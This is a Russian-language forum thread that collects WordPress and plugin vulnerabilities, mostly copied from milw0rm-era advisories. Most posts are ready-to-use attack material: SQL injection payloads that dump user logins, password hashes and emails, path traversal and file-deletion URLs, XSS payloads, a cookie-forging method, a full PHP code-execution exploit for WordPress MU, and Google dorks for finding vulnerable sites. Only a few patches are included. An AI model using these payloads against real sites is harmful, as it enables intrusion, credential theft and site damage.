|
|
Приветствую Вас Гость | RSS |
|
|
|
|
|
| | |
|
Обзор уязвимостей WordPress
| |
Decide | Дата: Среда, 14.11.2012, 10:43 | Сообщение # 16 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Code /wp-admin/index.php?page=\..\..\file.php /wp-admin/index.php?page=\..\..\.htaccess /wp-admin/link-manager.php?page=\..\..\.htaccess /wp-admin/link-add.php?page=\..\..\.htaccess /wp-admin/link-categories.php?page=\..\..\.htaccess /wp-admin/link-import.php?page=\..\..\.htaccess /wp-admin/theme-editor.php?page=\..\..\.htaccess /wp-admin/plugin-editor.php?page=\..\..\.htaccess /wp-admin/profile.php?page=\..\..\.htaccess /wp-admin/users.php?page=\..\..\.htaccess /wp-admin/options-general.php?page=\..\..\.htaccess /wp-admin/options-writing.php?page=\..\..\.htaccess /wp-admin/options-reading.php?page=\..\..\.htaccess /wp-admin/options-discussion.php?page=\..\..\.htaccess /wp-admin/options-permalink.php?page=\..\..\.htaccess /wp-admin/options-misc.php?page=\..\..\.htaccess /wp-admin/import.php?page=\..\..\.htaccess /wp-admin/admin.php?page=\..\..\.htaccess /wp-admin/bookmarklet.php?page=\..\..\.htaccess /wp-admin/cat-js.php?page=\..\..\.htaccess /wp-admin/inline-uploading.php?page=\..\..\.htaccess /wp-admin/options.php?page=\..\..\.htaccess /wp-admin/profile-update.php?page=\..\..\.htaccess /wp-admin/sidebar.php?page=\..\..\.htaccess /wp-admin/user-edit.php?page=\..\..\.htaccess
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:43 | Сообщение # 17 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| WordPress <=2.3.1 Cookies Manipulation - Вход по md5() хешу пароля в куках ход по md5() хешу пароля в куках
Программа: WordPress 2.3.1 и более ранние версии Опасность: Низкая Наличие эксплоита: Нет Описание: Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности.
Уязвимость существует из-за того, что злоумышленник может создать два аутентификационных файла куки ("wordpressuser_*" и "wordpresspass_*") из данных в таблице "users" и получить административный доступ к приложения. Для успешной эксплуатации уязвимости злоумышленнику требуется получить доступ на чтение таблицы "users" в базе данных.
описание и сайт http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt
==================================
PHP код: $siteurl;$host; 'wordpressuser_'.md5($siteurl).'='.$login 'wordpresspass_'.md5($siteurl).'='.md5(md5($pass))
Здесь $siteurl - переменная которая лежит в БД: wp_options -siteurl Тоесть при SQL-инъекции желательно вытащить и ее тоже: (select siteurl from wp_options)
Иногда один вордпресс используется для разных доменных имен. Тогда вместо $siteurl берется $host, фактически равное URL-пути до блога, например: http://wordpress.com/blog без слеша на конце.
NEW! Дополнение.
Раскрытие COOKIEHASH.
Необязательно вообще добывать siteurl, кодировать его в мд5 и проверять.
Достаточно послать пост-пакет на wp-pass.php или на wp-login.php В ответе вам вернется валидный COOKIEHASH кукиса.
[-1-] /wp-login.php?action=logout
[-2-] wp-pass.php
Код: POST /wordpress/wp-pass.php HTTP/1.0 Host: localhost Content-Length: 20
post_password=test
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:44 | Сообщение # 18 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Files locations Code blogscout lectblog blogs blog blog-* blog* myblog bloggt blo *-blog wp wordpress wordpress.1 wordpress-1 wordpress_1 wordpress-* wordpress_* weblog webblog webblogs web-blog my-journals myjournal my-favorite-blog myblog myblogs my-blogs wp1-5 wp2.2 wp2-2 wp2.3 wp2-3 wp2.2 wp2.0 powered-by-wordpress wordpress-mu wordpress_1_5 wordpress-1.5 wordpress-1-5-1 wordpress-1.5.2 wordpress-1.0.2 wordpress-1-2-2 wordpress_2.0_only wordpress_2.3-series wordpress_2.3.2 wordpress_2-3-1 Wordpress_2.4 Wordpress_2.5 Wordpress_2-5 wordpress_2.3.1 wordpress_2.0.2 wordpress_2.3 wordpress_2.0.7 Wordpress_2.4 wordpress_2.2.3 wordpress_2.1.2 WordPress_2.4 wordpress_2.3.1 WordPress_2-3 WordPress_2-2-2 WordPress_2-3-3 wordpress_2-3 Wordpress_2-2
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:44 | Сообщение # 19 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Democracy 2.0.1 HTML Injection Vulnerability Код: http://wordpress.dom/blah’st....okie)); (Tested on IE7) OR http://wordpress.dom/blah’on....cookie) ;// (Testing on Firebox & IE)
fix PHP код: Vulnerable code: in class.php (Line 166) $url = htmlspecialchars(add_query_arg(array(’dem_action’ => ‘view’, ‘dem_poll_id’ => $this->id)));
Change to: $url = htmlspecialchars(add_query_arg(array(’dem_action’ => ‘view’, ‘dem_poll_id’ => $this->id)), ENT_QUOTES); __________________
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:44 | Сообщение # 20 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| WP TextLinkAds Plugin SQL Injection Vulnerability Код: http://wordpress-blog/?textli....sers%23
fix PHP код: The vulnerable code is found on line 512: $postId = $postId; This variable is passed to $wpdb->get_results without being sanitised. to fix this hole, simply change the above line to: $postId = (int) $postId;
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:44 | Сообщение # 21 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| WordPress<=2.0.3 Arbitrary file deletion
Только на Windows:
Код HTML: http://site/wp-admin/edit.php?page=wp-db-backup.php&backup= \..\.. \.htaccess
Это также может быть использовано для проведения DoS-атаки. При удалении index.php сайт перестанет нормально функционировать.
WordPress<=2.0.3 DoS:
Код HTML: http://site/wp-admi....dex.php
Только на Windows: Код HTML: http://site/wp-admin/edit.php?page=wp-db-backup.php&backup= \..\.. \index.php
XSS:
Код HTML: http://site/wp-admin/edit.php?page=wp-db-backup. php&backup=%3Cscript%3Ealert(document. cookie)%3C/script%3E
XSS: wp-cat2tag converter: Код HTML: http://localhost/wp/wp-admin/admin.php?import=wp-cat2tag&-- ><script>alert(/XSS/)</script>
Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x).
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:44 | Сообщение # 22 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
Код: remote sql injection exploit ################################################## #############
# >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.
# >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pa ss,0x2f,user_email),null,null,null,null,null+from+ wp_users where id=1/*
(wp_tbv_users)
# >>> google: Fredrik Fahlstad. Version: 1.7.4.
# >>> author websec Team ./members =====> Virus_C, Refresh , Virusa
# >>> page : hacking.ge
################################################## #############
this is example
http://www.xxx.com/?page_i....0x2f,us er_pass,0x2f,user_email),null,null,null,null,null+ from+wp_tbv_users/*
# milw0rm.com [2008-01-19]
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:45 | Сообщение # 23 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| XSS in plugin wp-slimstat 0.92 para Wordpress
PoC directamente: Код: http://wordpress-web-blog.com/wp-admin/index.php?page=wp-sl imstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=[xss]
PoC En Perl: Код: # Wordpress 2.3 0day exploit – http://xssworm.com # # A bug exist in wordpress 2.3 that allow hacker to # steal blog cookie from wordpress blogmin. # # To exploit scripting bug the attacker make link # to URL of slimstat with XSS shellcode and force # blog admin to hit link by embedding into fish # email or making blogmin follow interesting links. # Also hacker can embed into refer or trackback # to inject scripting into wordpress dashboard or # make blogmin visit malicious resource when viewing # he’s blog. # # # Status: not patched published 0day vulnerability # Vendor: wordpress.org # Credit: http://xssworm.com # Discovery: 1st November 2007 # Exploit developer: Fracesco Vaj (vaj@xssworm.com) # # Instruction: # To execute exploit for wordpress you will need perl or linux # # Usage: # # Execute with perl or linux as: # perl wordpress-2.3-0day-xss-injection-bug.pl # # Hacker will get prompts for target information. # Please do not use for irresponsible hacking or to make money. # Disclaimer: XSSWORM.COM is not responsible. # # #use Net::DNS:Simple; #use Math; use Socket; print "Welcome. What is target email address of wordpress blog admin : \n"; my $target = <stdin>; print "ok target is $target\n"; sleep(3); print "ok What is address of wordpress blog : \n"; sleep(5); my $address = <stdin>; print "ok target is $target\n"; sleep(6); # print "testing" print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&ft=SHELLCODE\n"; print "\n\n — CUT OUTPUT HERE — \n\n"; print "HELO xssworm.com\n"; print "RSET\n"; PRINT "MAIL FROM: <xssworm@hotmail.com>\n"; print "RCPT TO: <$target>\n"; print "DATA\n”; print “Free x pciture and movies at $address\n"; print "\r\n.\r\nquit\r\n"; print "\n\n — END OF OUTPUT CUT HERE –\n"; print ""; print "Ok now you neeed to cut the exploit above and paste it to:\n"; print "$address : 25 \n"; print "Shellcode by vaj@xssworm.com c. 2007\n"; print "End of attack.\n"; print ""; #print "Debug mode on" #print "XSS initialized" #payload sleep(1); return(0); # snips</xssworm@hotmail.com></stdin></stdin>
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:45 | Сообщение # 24 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Full path disclosure: Код: /wp-admin/theme-editor.php?page= /wp-admin/plugins.php?page= /wp-admin/plugin-editor.php?page= /wp-admin/profile.php?page= /wp-admin/users.php?page= /wp-admin/options-general.php?page= /wp-admin/cat-js.php?page= /wp-admin/inline-uploading.php?page= /wp-admin/options.php?page= /wp-admin/profile-update.php?page= /wp-admin/sidebar.php?page= /wp-admin/user-edit.php?page= /wp-admin/admin.php?page= /wp-admin/admin-footer.php /wp-admin/admin-functions.php /wp-admin/edit-form.php /wp-admin/edit-form-advanced.php /wp-admin/edit-form-comment.php /wp-admin/edit-link-form.php /wp-admin/index.php?page= /wp-admin/link-manager.php?page= /wp-admin/link-add.php?page= /wp-admin/link-categories.php?page= /wp-admin/link-import.php?page= /wp-admin/edit-page-form.php /wp-admin/menu.php /wp-admin/menu-header.php /wp-admin/import/blogger.php /wp-admin/import/dotclear.php /wp-admin/import/greymatter.php /wp-admin/import/livejournal.php /wp-admin/options-writing.php?page= /wp-admin/options-reading.php?page= /wp-admin/options-discussion.php?page= /wp-admin/options-permalink.php?page= /wp-admin/options-misc.php?page= /wp-admin/import.php?page= /wp-admin/import/mt.php /wp-admin/import/rss.php /wp-admin/import/textpattern.php /wp-admin/bookmarklet.php?page=
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:45 | Сообщение # 25 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Изменения в версиях для общего ознакомления:
_http://trac.wordpress.org/changeset?old_path=tags%2F2.3.1&old=6528&new_path=tags%2F2.3.2&new=6528
_http://trac.wordpress.org/query?component=Security&milestone=2.3.2&order=priority
=====================
Описание: Перебор логина/пароля в обход логирования.
Возможность определение логина, перебора пароля через куки(wp-login.php), базик-авторизацию(wp-app.php).
PHP код: function wp_login()
__('<strong>ERROR</strong>: Invalid username.'); __('<strong>ERROR</strong>: Incorrect password.');
========================
Описание: Раскрытие COOKIEHASH.
Иногда бывают траблы с формированием куков для эксплоита. Обычно это происходит, если блог работает на несколько доменов/субдоменов сразу. "siteurl" добытый из базы не подходит. В хидере нас вернется пустой кукис с префиксом.
/wp-login.php?action=logout
/wp-pass.php
=====================
Описание: Права админа: Запись в wp-config.php
Отстутствие проверки имени файла при записи.
Читать в wp-config.php нельзя. Но при записи забыли поставить проверку.
Можно указать свой удаленный сервер и поадминить блог через свою бд.
Читать нельзя: /wp-admin/templates.php?file=wp-config.php
Но можно писать: /wp-admin/templates.php POST: newcontent=<?php;phpinfo();?>&action=update&file=wp-config.php
=====================
Описание: Passive XSS $_POST['pages-sortby']
Права: админ
Примеры уязвимого кода:
/wp-admin/widgets.php
PHP код: function wp_widget_pages_control() {
$sortby = stripslashes( $_POST['pages-sortby'] );
<option value="post_title"<?php selected( $options['sortby'], 'post_title' ); ?>><?php _e('Page title'); ?></option> <option value="menu_order"<?php selected( $options['sortby'], 'menu_order' ); ?>><?php _e('Page order'); ?></option> <option value="ID"<?php selected( $options['sortby'], 'ID' ); ?>><?php _e( 'Page ID' ); ?></option>
=====================
Описание: Хранение пароля и логина админа к мылу в открытом виде в бд, отображение в админке.
/wp-admin/options-writing.php
wp_options -mailserver_login -mailserver_pass
=====================
Описание: При импорте блога, если присутствуют посты без автора(анонимы), создается юзверь с дефолтными настройками.
Тоесть возможно существование учеток с дефолтным паролем "password".
Примеры уязвимого кода:
/wp-admin/import/greymatter.php
PHP код: $user_id = username_exists($post_author); if (!$user_id) { // if deleted from GM, we register the author as a level 0 user $user_ip="127.0.0.1"; $user_domain="localhost"; $user_browser="server"; $user_joindate="1979-06-06 00:41:00"; $user_login=$wpdb->escape($post_author); $pass1=$wpdb->escape("password"); $user_nickname=$wpdb->escape($post_author); $user_email=$wpdb->escape("user@deleted.com"); $user_url=$wpdb->escape(""); $user_joindate=$wpdb->escape($user_joindate);
$user_info = array("user_login"=>$user_login, "user_pass"=>$pass1, "user_nickname"=>$user_nickname, "user_email"=>$user_email, "user_url"=>$user_url, "user_ip"=>$user_ip, "user_domain"=>$user_domain, "user_browser"=>$user_browser, "dateYMDhour"=>$user_joindate, "user_level"=>0, "user_idmode"=>"nickname"); $user_id = wp_insert_user($user_info); $this->gmnames[$postinfo[1]] = $user_id;
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:45 | Сообщение # 26 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| # Author : Houssamix From H-T Team # Script : Wordpress Plugin fGallery 2.4.1 # Download : http://www.fahlstad.se/wp-plugins/fgallery/ # BUG : Remote SQL Injection Vulnerability # Dork : inurl:/wp-content/plugins/fgallery/
## Vulnerable CODE : ~~~~~~~ /wp-content/plugins/fgallery/fim_rss.php ~~~~~~~~~~~~~
PHP код: $cat = $wpdb->get_row("SELECT * FROM $cats WHERE id = $_GET[album]"); $images = $wpdb->get_results("SELECT * FROM $imgs WHERE cat = $_GET[album] AND status = 'include'");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~
# Exploit : [Target.il]/[wordpress_path]//wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users --
Example Цитата: http://site.il/wordpre....3a,user _pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users --
src='http://site.il/wordpress/wp-content/fgallery/thumb_admin:051e3db4c8eee42d7c93df48dffe4d5f:marku s@swimatyourownrisk.com ' /><br>5 markus@swimatyourownrisk.com Thu, 01 Jan 1970 00:00:00 +0100
# Script : Wordpress Plugin WP-Cal # Download : http://www.fahlstad.se/wp-plugins/wp-cal/ # BUG : Remote SQL Injection Vulnerability # Dorks : inurl:/wp-content/plugins/wp-cal/ inurl:/WP-Cal/
## Vulnerable CODE : ~~~~~~~ /wp-content/plugins/wp-cal/functions/editevent.php ~~~~~~~~~~~~~ PHP код: $id = $_GET['id']; $event = $wpdb->get_row("SELECT * FROM $table WHERE id = $id");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~
# Exploit : /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
example : Цитата: http://site.il/wordpre....3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:45 | Сообщение # 27 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress Plugin wp-adserve (adclick.php) SQL Injection
SQL Injection:
Код: http://www.site.com/wp-cont....,0x7c,u ser_pass,0x7c)%20from%20wp_users
Для поиска вводим:
Код: allinurl: "wp-adserve"
Wordpress Plugin WassUp 1.4.1 Remote SQL Injection
SQL Injection:
Код: http://www.site.com/wp-cont....2,conca t(0x7c,user_login,0x7c,user_pass,0x7c),3,4,0x7c,6, 0x7c,8,9,10%20%20from%20wp_users
Для поиска вводим:
Код: allinurl: "plugins/wassup"
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:46 | Сообщение # 28 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities
PoC:
http://milw0rm.com/exploits/5035
Wordpress Plugin Wordspew Remote SQL Injection Vulnerability
PoC:
http://milw0rm.com/exploits/5039
Wordpress Pluging wp-footnotes 2.2
Multiple XSS
Код:
http://site.tld/wordpre....wp_foot notes_current_settings[priority]="><script>alert("XSS" )</script>
http://site.tld/wordpre....wp_foot notes_current_settings[style_rules]=</textarea><script>alert(" XSS")</script>
http://site.tld/wordpre....current _settings[pre_footnotes]=</textarea><script>alert("XSS" )</script>
http://site.tld/wordpre....current _settings[post_footnotes]=</textarea><script>alert(":- (")
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:46 | Сообщение # 29 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress Plugin st_newsletter Remote SQL Injection
SQL Injection
Код: wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
Для поиска:
Код: allinurl :"wp-content/plugins/st_newsletter" allinurl :"shiftthis-preview.php"
Code Wordpress MU < 1.3.2 active_plugins option Code Execution
Exploit:
PHP код: <?php /* WordPress [MU] blog's options overwrite
Credits : Alexander Concha <alex at buayacorp dot com> Website : http://www.buayacorp.com/ Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html
This exploit uses active_plugins option to execute arbitrary PHP */ include_once './class-snoopy.php';
// Fix Snoopy class SnoopyExt extends Snoopy { function _prepare_post_body($formvars, $formfiles) { if ( is_string($formvars) ) { return $formvars; } return parent::_prepare_post_body($formvars, $formfiles); } }
set_time_limit( 0 );
// Any user with 'manage_options' and 'upload_files' capabilities $user = 'user'; $pass = '1234'; $blog_url = 'http://localhost.localdomain/mu/'; $remote_file = ''; // relative path to wp-content $local_file = ''; // the contents of this file, if any, will be uploaded
$snoopy = new SnoopyExt();
$snoopy->maxredirs = 0; $snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check'; $snoopy->submit("{$blog_url}wp-login.php", array('log' => $user, 'pwd' => $pass));
$snoopy->setcookies(); // Set auth cookies for future requests
if ( empty($remote_file) ) { // Upload a new file $snoopy->_submit_type = 'image/gif'; $snoopy->submit("{$blog_url}wp-app.php?action=/attachments", get_contents());
if ( preg_match('#<id>([^<]+)</id>#i', $snoopy->results, $match) ) { $remote_file = basename($match[1]); } } if ( empty($remote_file) ) die('Exploit failed...');
// Look for real path $snoopy->fetch("{$blog_url}wp-admin/export.php?download");
if ( preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#", $snoopy->results, $match) ) { $remote_file = preg_replace('#.*?wp-content#', '', $match[1]); } if ( empty($remote_file) ) die('Exploit failed...');
// It asumes that file uploads are stored within wp-content $remote_file = '../' . ltrim($remote_file, '/');
$snoopy->fetch("{$blog_url}wp-admin/plugins.php");
// Recover previous active plugins $active_plugins = array(); if ( preg_match_all('#action=deactivate&([^\']+)#', $snoopy->results, $matches) ) { foreach ($matches[0] as $plugin) { if ( preg_match('#plugin=([^&]+)#', $plugin, $match) ) $active_plugins[] = urldecode($match[1]); } print_r($active_plugins); } $active_plugins[] = $remote_file;
// Fetch a valid nonce $snoopy->fetch("{$blog_url}wp-admin/options-general.php");
if ( preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#', $snoopy->results, $match) ) {
// Finally update active_plugins $snoopy->set_submit_normal(); $snoopy->submit("{$blog_url}wp-admin/options.php", array( 'active_plugins' => $active_plugins, '_wpnonce' => $match[1], 'action' => 'update', 'page_options' => 'active_plugins', )); }
function get_contents() { global $local_file;
return file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>'; } ?>
# milw0rm.com [2008-02-05]
|
|
| |
Decide | Дата: Среда, 14.11.2012, 10:46 | Сообщение # 30 |
Полковник
Группа: Администраторы
Сообщений: 241
Статус: Offline
| Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability
example Код: http://xxxxx/forums?forum=xxxx&topic= (expliot)
EXPLOİT 1 :
Код: -99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
EXPLOİT 2 :
Код: SİMETİMES YOU CANT SEE (xxxx&topic) SOO USE THİS EXPLOİT AFTER forum=xxx(number)
example
Код: www.xxxxx/forums?forum=1(expliot) &topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability
example : Код:
http://www.xxx.com/sf-forum?forum=[exploit]
EXPLOIT 1 :
Код: -99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
exploit 2 :
Код: -99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0, 0,0,0/**/FROM/**/wp_users/*
(с)milw0rm.com
|
|
| |
| |
| | |
|
|
|
Воскресенье, 22.12.2024, 09:24 |
|